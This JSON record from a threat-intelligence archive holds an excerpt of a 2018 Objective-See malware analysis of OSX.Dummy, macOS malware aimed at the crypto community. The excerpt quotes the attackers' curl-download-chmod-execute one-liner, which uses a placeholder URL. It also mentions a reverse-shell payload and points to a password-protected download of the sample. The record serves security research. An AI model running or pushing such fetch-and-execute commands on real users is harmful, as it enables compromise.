{
	"id": "830d0728-b73d-49a9-80c5-1a6b0e1d432f",
	"created_at": "2026-04-06T00:07:48.748987Z",
	"updated_at": "2026-04-10T13:12:24.140653Z",
	"deleted_at": null,
	"sha1_hash": "0950778f17320bcfce725944181c94a7d7f2c530",
	"title": "Objective-See",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 274250,
	"plain_text": "OSX.Dummy\r\nnew mac malware targets the cryptocurrency community\r\n06/29/2018\r\nEarly today, Remco Verhoef (@remco_verhoef) posted an interesting entry to SANS 'InfoSec Handlers Diary Blog'.\r\nTitled \"Crypto community target of MacOS malware\" he noted:\r\n\"Previous days we've seen multiple MacOS malware attacks, originating within crypto related Slack or Discord chats groups by impersonating admins or key people. Small snippets are being shared, resulting in downloading and executing a malicious binary.\"\r\nHis great writeup notes the initial infection vector and provides an overview of the malware, including its method of persistence (launch daemon) and purpose (reverse shell).\r\nHere, we dive in a touch deeper into the malware and illustrate how Objective-See's tools can generically thwart this new threat, at every step of the way!\r\nWant to play along? 👾☠️\r\nI've shared the malware, which can be downloaded here (password: infect3d).\r\nRemco Verhoef states the malware attacks are:\r\n\"originating within crypto related Slack or Discord chats groups by impersonating admins or key people. Small snippets are being shared, resulting in downloading and executing a malicious binary.\r\nApparently attackers are asking users to infect themselves, via the following command:\r\n$ cd /tmp \u0026\u0026 curl -s curl $MALICIOUS_URL \u003e script \u0026\u0026 chmod +x script \u0026\u0026 ./script\r\nIf users fall for this (rather lame) social engineering trick, a rather massive Mach-O binary will be downloaded and executed.\r\nMassive you say? Yes, it clocks in at 34M:\r\n$ du -h /tmp/script\r\n34M script\r\nUsing WhatsYourSign, we can see that the malicious binary is not signed:\r\nhttps://objective-see.com/blog/blog_0x32.html",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://objective-see.com/blog/blog_0x32.html"
	],
	"report_names": [
		"blog_0x32.html"
	],
	"threat_actors": [
		{
			"id": "75108fc1-7f6a-450e-b024-10284f3f62bb",
			"created_at": "2024-11-01T02:00:52.756877Z",
			"updated_at": "2026-04-10T02:00:05.273746Z",
			"deleted_at": null,
			"main_name": "Play",
			"aliases": null,
			"source_name": "MITRE:Play",
			"tools": [
				"Nltest",
				"AdFind",
				"PsExec",
				"Wevtutil",
				"Cobalt Strike",
				"Playcrypt",
				"Mimikatz"
			],
			"source_id": "MITRE",
			"reports": null
		}
	],
	"ts_created_at": 1775434068,
	"ts_updated_at": 1775826744,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/0950778f17320bcfce725944181c94a7d7f2c530.pdf",
		"text": "https://archive.orkl.eu/0950778f17320bcfce725944181c94a7d7f2c530.txt",
		"img": "https://archive.orkl.eu/0950778f17320bcfce725944181c94a7d7f2c530.jpg"
	}
}